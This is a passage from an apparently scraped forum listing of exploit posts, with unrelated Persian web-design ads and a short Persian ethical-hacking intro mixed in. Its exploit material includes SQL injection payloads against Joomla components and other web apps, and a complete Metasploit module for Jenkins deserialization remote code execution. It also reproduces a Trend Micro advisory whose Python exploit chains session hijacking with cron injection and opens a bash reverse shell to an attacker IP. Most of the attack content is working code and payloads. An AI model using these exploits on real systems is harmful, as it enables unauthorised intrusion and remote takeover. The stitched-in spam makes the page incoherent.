(GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=2&fmid=10&fnid=12 AND 1592=1592 # # Parameter: fmid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=2&fmid=10 AND 3227=3227&fnid=12 # # Parameter: bgid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=2 AND 6608=6608&fmid=10&fnid=12 # # 3) # http://localhost/[PATH]/album.php?bgid=[SQL]&fmid=[SQL] # # Parameter: fmid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=2&fmid=10 AND 9273=9273 # # Parameter: bgid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=2 AND 9536=9536&fmid=10 # # 4) # http://localhost/[PATH]/fourm.php?bgid=[SQL]&fmid=[SQL] # # Parameter: fmid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=1&fmid=2 AND 5699=5699 # # Parameter: bgid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=1 AND 9899=9899&fmid=2 # # # # # #
  18. Hacking

    # # # # # # Exploit Title: Joomla! Component Guru Pro 'promocode'- SQL Injection # Dork: N/A # Date: 17.12.2017 # Vendor Homepage: https://www.ijoomla.com/ # Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189 # Version: N/A # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/guruBuy?promocode=[SQL] # # '%20/*!50000Procedure*/%20/*!50000Analyse*/%20(extractvalue(0%2c/*!50000concat*/(0x27%2c0x496873616e2053656e63616e%2c0x3a%[email protected]@version))%2c0)%2d%2d%200x2d # # # # # #
  19. Hacking

    # Exploit Title: BrightSign Digital Signage (Multiple Vulnerabilities) # Date: 12/15/17 # Exploit Author: [email protected] # Vectors: XSS, Directory Traversal, File Modification, Information Leakage The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below) suffers from multiple vulnerabilities. The pages: /network_diagnostics.html /storage_info.html Suffer from a Cross-Site Scripting vulnerability. The REF parameter for these pages do not sanitize user input, resulting in arbitrary execution, token theft and related attacks. The RP parameter in STORAGE.HTML suffers from a directory traversal/information leakage weakness: /storage.html?rp=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc Through parameter manipulation, the file system can be traversed, unauthenticated, allowing for leakage of information and compromise of the device. This page also allows for unauthenticated upload of files. /tools.html Page allows for unauthenticated rename/manipulation of files. When combined, these vulnerabilities allow for compromise of both end users and the device itself. Ex. A malicious attacker can upload a malicious page of their choosing and steal credentials, host malicious content or distribute content through the device, which accepts large format SD cards.
  20. Hacking

    طراحی سایت پرده فروشی طراحی سایت پرده فروشی طراحی سایت مانند ایر طراحی سایت های دیگر طراحی سایت نمایشگاه چرده فروشی برای هدف های خاصی از جمله رونق کسب و کار و کسب اعتبار بیشتر طراحی و پیاده سازی میشود. حال برای موفقیت در این هدف طراحی سایت پرده فروشی باید شامل یک سری امکانات و ویژگی ها باشد که عبارتند از: معرفی فروشگاه پرده فروشی، دسته بندی کردن محصولات، گالری و اسلاید تصاویر از همه ی محصولات در طرح ها و رنگ های مختلف، اماکن فروش آنلاین محصولات، اطلاعات کامل از هر محصول و همچنین قرار دادن قیمت هر محصول و... را دارا باشد. اگر چنین طراحی سایتی را داشته باشید دیگر در این زمینه هیچ چیزی از رقبای خود کم ندارید، و از این طریق در نتیجه جستجو ی تمامی کاربران و بازدید کنندگان که به دنبال بهترین و با کیفیت ترین محصولات هستند قرار داشته باشید. که این موضوع باعث فروش بیشتر شما در هر زمان میشود و فروش شما را افزایش می دهد و به عنوان فروشگه معتبر دربین مردم قرار خواهید گرفت. خانم ها برای داشتن منزلی زیباتر همیشه به دنبال تصاویر خاصی از پرده های مختلفی هستند که متناسب با نظر و سلیقه ی آنها باشد حال چه بهتر که فروشگاه مدنظر آنها طراحی سایت پرده فروشی شما باشد تا از طریق آن تصاویر موردنظر خود را پیدا کرده و برای خرید حضوری به فروشگاه شما مراجعه کنند. معمولا ویژگی ها و امکانات طراحی سایت های نمایشگاه پرده فروشی عبارتند از: 1. سرعت بارگذاری صفحات طراحی سایت باید از اهمیت بسیار بالایی برخوردار باشد که در شرکت طرحی سایت نونگار این موضوع از مهم ترین اولویت ها می باشد . برای طراحی سایت های پرده فروشی به دلیل اینکه تصاویر زیادی با حجم بالایی در طراحی سایت قرار میگیرند برای فشرده سازی از تکنولوژی GZIP استفاده می شود. 3. وجود گالری و اسلاید تصاویر برای هر محصول به مشتریان کمک میکند تا علاوه بر اینکه نسبت به ابعاد ، قیمت و جنس آشنایی پیدا میکنند به راحتی از طریق تصاویر میتوانند رنگ و طرح پرده را نیز مشاهده کنند. 4. امکان معرفی تمامی محصولات و ثبت سفارش متناسب با طرح و رنگ دلخواه مشتری در طراحی سایت وجود دارد. مزایای طراحی وب سایت آموزشگاه از جمله مهمترین مزایای این ایده ی طراحی سایت می توان به این مورد اشاره داشت که سایت طراحی شده برای آموزشگاه شما درواقع ویترین فعالیت های شماست و شما در این مورد خواهید توانست هرچه بهتر به معرفی فعالیت های مجموعه ی خود بپردازید. شما در سایت خود می توانید اخبار روزانه ی اموزشگاه خود را ارائه دهید و همچنین دوره های آموزشی و ساعت ارائه ی کلاس ها و نیز معرفی اساتید مجموعه خود را داشته باشید . امکان ثبت نام ان لاین کلاس ها و پرداخت هزینه ی ان از طریق درگاه پرداخت اینترنتی و همچنین قرار دادن جزوه های کلاس ها و دوره های اساتید به صورت پی دی اف برای دانشجویای از جمله مزایای استفاده از یک طراحی سایت اموزشگاه شماست . متخصصین ما در مجموعه ی نونگار نیز در این زمینه اماده ی همکاری و ارائه ی خدمات را به شما مخاطبان خواهند داشت .
  21. Hacking

    طراحی سایت پروژه شفافیت بودن اطلاعات و میزان رشد و افزایش پروژه از عوامل مهمی است که بر تصمیم گیری کارفرمایان بسیار تأثیر گذار خواهد بود . در دوره های قبل تر کارفرما برای اطلاع از میزان رشد و کسب اطلاعات کافی مجبور به بازدید حضوری از محل پروژه بود و یا اینکه با کارگزار و مسئول اجرای پروژه مدام در تماس باشد . اما امروزه با توجه به رشد و پیشرفت در عصر ارتباطات دیگر نیازی به صرف زمان و هزینه های بالا برای بازدید حضوری و تماس با مسئول پروژه نیست. بنابراین مسئولین اجرای پروژه قادر خواهند بود به کمک طراحی سایت پروژه نمونه کارهای خود ، تعداد نیروهای انسانی ، گالری و اسلاید تصاویر و … را در اختیار کارفرما قرار دهند . طراحی سایت پروژه های فروشگاهی به طراحی سایت هایی که میزان رشد و پیشرفت روند پروزه را نشان میدهند طراحی سایت های پروژه محور گفته میشود . از آن دسته از طراحی سایت هایی که در شرکت نونگار طراحی و پیاده سازی میشود طراحی سایت های پروژه ای هستند ، بنابراین شرکت نونگار با بیشترین تجربه وسابقه در این زمینه قادر به طراحی بهترین و کارآمد ترین وب سایت ها خواهد بود. از امکانات عمومی و مهمی که در تمامی طراحی سایت ها باید اجرا و عملی شوند عبارتند از: طراحی گرافیکی زیبا و منحصر به فرد ، سرعت بارگذاری بالای صفحات ، داشتن امنیت بالا ، نامحدود بودن برگه ها و... می باشد. ظاهری مناسب و متناسب با نوع سایت برای تمامی طراحی سایت ها باید در نظر گرفته شود که سایت های پروژه نیز از آن مستثنی نیستند ، شرکت طراحی سایت نونگار در ابتدا با در نظر گرفتن نوع سفارش و امکانات مد نظر شما طرح اولیه سایت شما را طراحی کرده و پس از تأیید شما آن را پیاده سازی میکند که همین موضوع مهم باعث جلب رضایت مندی مشتریان بسیاری شده است . معمولا ویژگی ها و امکانات طراحی سایت های پروژه عبارتند از: • قرار دادن میزان پیشرفت پروژه به صورت گرافیکی و اتوماتیک • قرار دادن گالری و اسلاید تصاویر مربوط به پروژه مورد نظر • امکان نمایش تعداد نفرات مشغول به اجرای پروژه و تعداد افراد درگیر در پروژه • امکان قرار دادن میزان رضایت تا میزان پیشرفت از کارفرما • امکان ارتباط مستقیم با مسئول پروژه و همچنین امکان ثبت پیشنهادات و انتقادات
  22. Hacking

    مقدمه اغلب مردم فكر ميكنند كه هكرها، مهارت و دانش بالايي دارند كه ميتوانند سيستمهاي كامپيوتري را هك كنند و نقاط آسيبپذير را پيدا كنند. در حقيقت، يك هكر خوب، تنها بايد نحوه كار سيستم كامپيوتري را بداند و نيز بداند كه از چه ابزارهايي براي يافتن ضعفهاي امنيتي استفاده ميشود . اين فصل دنياي هكرهاي قانونمند را معرفي ميكند. هك قانونمند نوعي هك است كه با مجوز سازماني و براي افزايش امنيت انجام ميگيرد
  23. # # # # # # Exploit Title: Joomla! Component NextGen Editor 2.1.0 - SQL Injection # Dork: N/A # Date: 19.12.2017 # Vendor Homepage: hhttp://nextgeneditor.com/ # Software Link: https://extensions.joomla.org/extension/nextgen-editor/ # Software Download: http://nextgeneditor.com/index.php/en/testcategory/send/2-nge-editor-full/33-nextgeneditor-full-free # Version: 2.1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/index.php?option=com_nge&view=config&plname=[SQL] # # %22%20%20%2f%2a%21%30%37%37%37%37%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%37%37%37%37%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%2800%2c%2f%2a%21%30%37%37%37%37%63%6f%6e%63%61%74%2a%2f%280x27%2c0x496873616e2053656e63616e%2c0x3a%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c0%29%2d%2d%20%2d # # # # # #
  24. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Powershell def initialize(info = {}) super(update_info(info, 'Name' => 'Jenkins XStream Groovy classpath Deserialization Vulnerability', 'Description' => %q{ This module exploits CVE-2016-0792 a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath, which allows remote arbitrary code execution. The issue affects default installations. Authentication is not required to exploit the vulnerability. }, 'Author' => [ 'Arshan Dabirsiaghi', # Vulnerability discovery 'Matt Byrne <attackdebris[at]gmail.com>' # Metasploit module ], 'DisclosureDate' => 'Feb 24 2016', 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2016-0792'], ['URL', 'https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream'], ['URL', 'https://wiki.jenkins.io/pages/viewpage.action?pageId=95585413'] ], 'Platform' => %w{ win linux unix }, 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64], 'Targets' => [ ['Unix (In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD ], ['Python (In-Memory)', 'Platform' => 'python', 'Arch' => ARCH_PYTHON ], ['Linux (Dropper)', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64] ], ['Windows (Dropper)', 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] ] ], 'DefaultTarget' => 0 )) register_options([ OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']), Opt::RPORT('8080') ]) deregister_options('URIPATH') end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) }) unless res fail_with(Failure::Unknown, 'The connection timed out.') end http_headers = res.headers if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f < 1.650 return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end end def exploit case target.name when /Unix/, /Python/ execute_command(payload.encoded) else execute_cmdstager end end # Exploit methods def execute_command(cmd, opts = {}) cmd = case target.name when /Unix/, /Linux/ %W{/bin/sh -c #{cmd}} when /Python/ %W{python -c #{cmd}} when /Windows/ %W{cmd.exe /c #{cmd}} end # Encode each command argument with XML entities cmd.map! { |arg| arg.encode(xml: :text) } res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/createItem'), 'vars_get' => { 'name' => 'random' }, 'ctype' => 'application/xml', 'data' => xstream_payload(cmd) ) end def xstream_payload(cmd) <<EOF <map> <entry> <groovy.util.Expando> <expandoProperties> <entry> <string>hashCode</string> <org.codehaus.groovy.runtime.MethodClosure> <delegate class="groovy.util.Expando"/> <owner class="java.lang.ProcessBuilder"> <command> <string>#{cmd.join('</string><string>')}</string> </command> </owner> <method>start</method> </org.codehaus.groovy.runtime.MethodClosure> </entry> </expandoProperties> </groovy.util.Expando> <int>1</int> </entry> </map> EOF end end
  25. # Trend Micro Smart Protection Server Multiple Vulnerabilities ## 1. Advisory Information **Title:**: Trend Micro Smart Protection Server Multiple Vulnerabilities **Advisory ID:** CORE-2017-0008 **Advisory URL:** http://www.coresecurity.com/advisories/trend-micro-smart-protection-server-multiple-vulnerabilities **Date published:** 2017-12-19 **Date of last update:** 2017-12-11 **Vendors contacted:** Trend Micro **Release mode:** Coordinated release ## 2. Vulnerability Information **Class:** Information Exposure Through Log Files [[CWE-532](http://cwe.mitre.org/data/definitions/532.html)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](http://cwe.mitre.org/data/definitions/78.html)], Improper Control of Filename for Include/Require Statement in PHP Program [[CWE-98](http://cwe.mitre.org/data/definitions/98.html)], Improper Neutralization of Input During Web Page Generation [[CWE-79](http://cwe.mitre.org/data/definitions/79.html)], Improper Authorization [[CWE-285](http://cwe.mitre.org/data/definitions/285.html)] **Impact:** Code execution **Remotely Exploitable:** Yes **Locally Exploitable:** Yes **CVE Name:** [CVE-2017-11398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11398), [CVE-2017-14094](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14094), [CVE-2017-14095](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14095), [CVE-2017-14096](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14096), [CVE-2017-14097](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14097) ## 3. Vulnerability Description Trend Micro's website states that: Trend Micro Smart Protection Server [(http://cwe.mitre.org/data/definitions/532.html)(https://www.coresecurity.com#SPS)] is a next-generation, in-the-cloud based, advanced protection solution. At the core of this solution is an advanced scanning architecture that leverages malware prevention signatures that are stored in-the-cloud. This solution leverages file reputation and Web reputation technology to detect security risks. The technology works by off loading a large number of malware prevention signatures and lists that were previously stored on endpoints to Trend Micro Smart Protection Server. Multiple vulnerabilities were found in the Smart Protection Server's Administration UI that would allow a remote unauthenticated attacker to execute arbitrary commands on the system. ## 4. Vulnerable Packages * Trend Micro Smart Protection Server 3.2 (Build 1085) Other products and versions might be affected, but they were not tested. ## 5. Vendor Information, Solutions and Workarounds Trend Micro published the following patches: * TMSPS3.0 - Critical Patch B1354 ([link](http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4556®s=NABU&lang_loc=1#fragment-4628)) * TMSPS3.1 - Critical Patch B1057 ([link](http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4974®s=NABU&lang_loc=1#fragment-5030)) ## 6. Credits These vulnerabilities were discovered and researched by Leandro Barragan and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. ## 7. Technical Description / Proof of Concept Code In section 7.1 we describe how an unauthenticated attacker could get a session token to perform authenticated requests against the application. Sections 7.2 and 7.3 describe two vectors to achieve remote command execution in the context of the Web application. Several public privilege escalation vulnerabilities exist that are still unpatched. In combination with the aforementioned vulnerabilities a remote unauthenticated attacker would be able to execute arbitrary system commands with root privileges. Sections 7.4 and 7.5 cover other common Web application vulnerabilities found in the product's console. ### 7.1 Session hijacking via log file disclosure [[CVE-2017-11398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11398)] The application stores diagnostic logs in the /widget/repository/log/diagnostic.log file. Performing a login or some basic browsing will write several entries with the following format: ``` 2017-08-18 17:00:38,468,INFO,rti940901j0556161dudhj6805,null, Notice: Undefined index: param in /var/www/AdminUI/widget/inc/class/common/db/GenericDao.php on line 218 ``` Each log entry leaks the associated session ID next to the log alert level and can be accessed via HTTP without authenticating to the Web application. Therefore, an unauthenticated attacker can grab this file and hijack active user sessions to perform authenticated requests. ### 7.2 Remote command execution via cron job injection [[CVE-2017-14094](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14094)] The script admin_update_program.php is responsible for creating a cron job when software updates are scheduled. The HTTP request contains several parameters that are used without sanitization as part of the cron job created at /var/spool/cron/webserv. We will target the hidTimingMin parameter. File /var/www/AdminUI/php/admin_update_program.php: ``` if ($_SERVER['REQUEST_METHOD'] == 'POST'){ [...] $arr_au['Program']['AUScheduleTimingMin']= isset($_POST["hidTimingMin"])?$_POST["hidTimingMin"]:"0"; [...] if ( $arr_au['Program']['UseAUSchedule'] == "1"){ if ( $arr_au['Program']['AUScheduleType'] == "0" ){ $crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", "*"); }else { $crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", $arr_au['Program']['AUScheduleTimingDay']); } $crontab->setCommand("/usr/tmcss/bin/UpdateManage.exe --Program --Schedule > /dev/null 2>&1"); $crontab->saveCronFile(); } if(! $crontab->addToCrontab()){ header( 'Location: admin_update_program.php?status=savecrontaberror&sid='.$session_name ) ; exit; } ``` File /var/www/AdminUI/php/inc/crontab.php: ``` function setDateParams($min=NULL, $hour=NULL, $day=NULL, $month=NULL, $dayofweek=NULL){ if($min=="0") $this->minute=0; elseif($min) $this->minute=$min; else $this->minute="*"; if($hour=="0") $this->hour=0; elseif($hour) $this->hour=$hour; else $this->hour="*"; $this->month=($month) ? $month : "*"; $this->day=($day) ? $day : "*"; $this->dayofweek=($dayofweek != NULL) ? $dayofweek : "*"; } function saveCronFile(){ $command=$this->minute." ".$this->hour." ".$this->day." ".$this->month." ".$this->dayofweek." ".$this->command."n"; if(!fwrite($this->handle, $command)) return true; else return false; } function addToCrontab(){ if(!$this->filename) exit('No name specified for cron file'); $data=array(); exec("crontab ".escapeshellarg($this->directory.$this->filename),$data,$ret); if($ret==0) return true; else return false; } ``` The following python script creates a cron job that will run an arbitrary command on every minute. It also leverages the session hijacking vulnerability described in 7.1 to bypass the need of authentication. ``` #!/usr/bin/env python import requests import sys def exploit(host, port, command): session_id = get_session_id(host, port) print "[+] Obtained session id %s" % session_id execute_command(session_id, host, port, command) def get_session_id(host, port): url = "https://%s:%d/widget/repository/log/diagnostic.log" % (host, port) r = requests.get(url, verify=False) for line in r.text.split('n')[::-1]: if "INFO" in line or "ERROR" in line: return line.split(',')(http://cwe.mitre.org/data/definitions/98.html) def execute_command(session_id, host, port, command): print "[+] Executing command '%s' on %s:%d" % (command, host, port) url = "https://%s:%d/php/admin_update_program.php?sid=%s" % (host, port, session_id) multipart_data = { "ComponentSchedule": "on", "ComponentScheduleOS": "on", "ComponentScheduleService": "on", "ComponentScheduleWidget": "on", "useAUSchedule": "on", "auschedule_setting": "1", "update_method": "1", "update_method3": "on", "userfile": "", "sid": session_id, "hidComponentScheduleOS": "1", "hidComponentScheduleService": "1", "hidComponentScheduleWidget": "1", "hidUseAUSchedule": "1", "hidScheduleType": "1", "hidTimingDay": "2", "hidTimingHour": "2", "hidTimingMin": "* * * * * %s #" % command, "hidUpdateOption": "1", "hidUpdateNowFlag": "" } r = requests.post(url, data=multipart_data, cookies={session_id: session_id}, verify=False) if "MSG_UPDATE_UPDATE_SCHEDULE" in r.text: print "[+] Cron job added, enjoy!" else: print "[-] Session has probably timed out, try again later!" if __name__ == "__main__": exploit(sys.argv(http://cwe.mitre.org/data/definitions/532.html), int(sys.argv(http://cwe.mitre.org/data/definitions/78.html)), sys.argv(http://cwe.mitre.org/data/definitions/98.html)) ``` The following proof of concept opens a reverse shell to the attacker's machine. ``` $ python coso.py 192.168.45.186 4343 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1' [+] Obtained session id q514un6ru6stcpf3k0n4putbd3 [+] Executing command 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1' on 192.168.45.186:4343 [+] Cron job added, enjoy! $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.45.186] port 8888 [tcp/*] accepted (family 2, sport 59508) bash: no job control in this shell [[email protected] localhost ~]$ ``` ### 7.3 Remote command execution via local file inclusion [[CVE-2017-14095](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14095)] The /widget/inc/widget_package_manager.php script passes user provided input to the PHP require_once function without sanitization. However, there are some restrictions that need to be overcome in order to include arbitrary files, as the application appends PoolManager.php at the end of the filename. File /var/www/AdminUI/widget/inc/widget_package_manager.php: ``` switch($widgetRequest['act']){ case "check": try{ // $strUpdateType = widget, configure_widget_and_widget_component $strUpdateType = isset($widgetRequest['update_type']) ? $widgetRequest['update_type'] : 'widget'; $strFuncName = 'is'.WF::getTypeFactory()->getString()->getUpperCamelCase($strUpdateType).'Update'; $isUpdate = WF::getWidgetPoolFactory()->getWidgetPoolManager($strUpdateType)->$strFuncName(); [...] ``` File /var/www/AdminUI/widget/inc/class/widgetPool/WidgetPoolFactory.abstract.php: ``` public function getWidgetPoolManager($strUpdateType = 'widget'){ if(! isset(self::$instance[__FUNCTION__][$strUpdateType])){ $strFileName = $this->objFramework->getTypeFactory()->getString()->getUpperCamelCase($strUpdateType); require_once (self::getDirnameFile() . '/widget/'.$strFileName.'PoolManager.php'); $strClassName = 'WF'.$strFileName.'PoolManager'; self::$instance[__FUNCTION__][$strUpdateType] = new $strClassName($this->objFramework); } return self::$instance[__FUNCTION__][$strUpdateType]; } ``` One way for an attacker to place an arbitrary file on the system is to abuse the update process that can be managed from the same product console. Files downloaded from alternate update sources are stored in the /var/tmcss/activeupdate directory. An attacker can setup a fake update server and trigger an update from it to download the malicious archive. As an example, we have packed a reverse shell named rshellPoolManager.php into the bf1747402402.zip archive. The following server.ini would instruct the application to download the archive and uncompress it inside /var/tmcss/activeupdate: ``` ; ======================================= ; ActiveUpdate 1.2 US ; ; Filename: Server.ini ; ; New Format AU 1.8 ; ; Last modified by AUJP1 10/14/2015 ; ======================================= [Common] Version=1.2 CertExpireDate=Jul 28 08:52:40 2019 GMT [Server] AvailableServer=1 Server.1=http://<serverIP>:1080/ AltServer=http://<serverIP>:1080/ Https=http://<serverIP>:1080/ [PATTERN] P.48040039=pattern/bf1747402402.zip,1747402402,257 ``` After triggering an update from the Web console, the PHP script is written to the expected location. ``` [[email protected] localhost activeupdate]# ls -lha /var/tmcss/activeupdate/ | grep php -rw-r--r--. 1 webserv webserv 66 ago 25 22:59 rshellPoolManager.php ``` The final step is to include the script and execute our payload. ``` POST /widget/inc/widget_package_manager.php?sid=dj0efdmskngvt4lbhakgc6cru7 HTTP/1.1 Host: 192.168.45.186:4343 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: application/json Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Request: JSON X-CSRFToken: dj0efdmskngvt4lbhakgc6cru7 Content-Type: application/json; charset=utf-8 Content-Length: 122 Cookie: dj0efdmskngvt4lbhakgc6cru7=dj0efdmskngvt4lbhakgc6cru7 Connection: close {"act": "check", "update_type": "../../../../../../../../../var/tmcss/activeupdate/rshell"} ``` Steven Seeley and Roberto Suggi Liverani presented various privilege escalation vectors to move from webserv to root on their presentation "I Got 99 Trends and a # Is All Of Them". Based on our testing the attacks remain unpatched, so we did not try to find additional ways to escalate privileges. ### 7.4 Stored cross-site scripting [[CVE-2017-14096](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14096)] The ru parameter of the wcs_bwlists_handler.php script is vulnerable to cross-site scripting. This endpoint is used to manage user defined URLs. After the rule is inserted, the payload will be executed every time the user opens the user defined URLs section. The following proof of concept stores code to open an alert box. ``` https://<serverIP>:4343/php/wcs_bwlists_handler.php?sid=2f03bf97fc4912ee&req=mgmt_insert&st=1&ac=0&ru=http%3A%2F%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E&rt=3&ipt=0&ip4=&ip4m=128&cn=&dn= ``` ### 7.5 Improper access control [[CVE-2017-14097](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14097)] The product console includes widgets that can be used to monitor other servers. Credentials to access the servers being monitored, widget logs and other information reside on a SQLite database which can be accessed without authentication at the following URL: ``` https://<serverIP>:4343/widget/repository/db/sqlite/tmwf.db ``` The credentials are stored using AES256 with a dynamic key. However, the key is also placed inside the Web server directories and available for download without authentication. ``` https://<serverIP>:4343/widget/repository/inc/class/common/crypt/crypt.key ``` This would allow an attacker to decrypt the contents of the database, rendering the encryption mechanism useless. ## 8 Report Timeline * **2017-09-04: **Core Security sent an initial notification to Trend Micro, including a draft advisory. * **2017-10-02: **Core Security asked for an update on the vulnerability reported. * **2017-10-02: ** Trend Micro stated they are still in the process of creating the official fix for the vulnerabilities reported. ETA for the fix should be end of this month (October) * **2017-11-13: **Core Security requested a status on the timeline for fixing the reported vulnerabilities since the original ETA was not accomplished. * **2017-11-14: ** Trend Micro stated they are still working on the Critical Patch and found problems along the way. Patch is now in QA. * **2017-11-20: ** Trend Micro informed availability for the fixes addressing 5 out of the 6 vulnerabilities reported. They stated one of the reported vulnerabilities is on a table where the SQL query is allowed and 'does not cause anything leaking'. Still in the process of localizing the critical patches for other regions. Will let us know when everything is covered in order to set a disclosure date. * **2017-11-21: **Core Security thanked the update and agreed on removing one of the reported vulnerabilities. * **2017-12-05: ** Trend Micro provided the CVE-ID for all the vulnerabilities reported and proposed the public disclosure date to be December 14th. * **2017-12-06: **Core Security thanked the update and proposed public disclosure date to be Tuesday December 19th @ 12pm EST. * **2017-12-19: ** Advisory CORE-2017-0008 published. ## 9 References http://cwe.mitre.org/data/definitions/532.html ## 10 About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: . ## 11 About Core Security Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [[email protected]](mailto:info%40coresecurity.com) ## 12 Disclaimer The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License:
×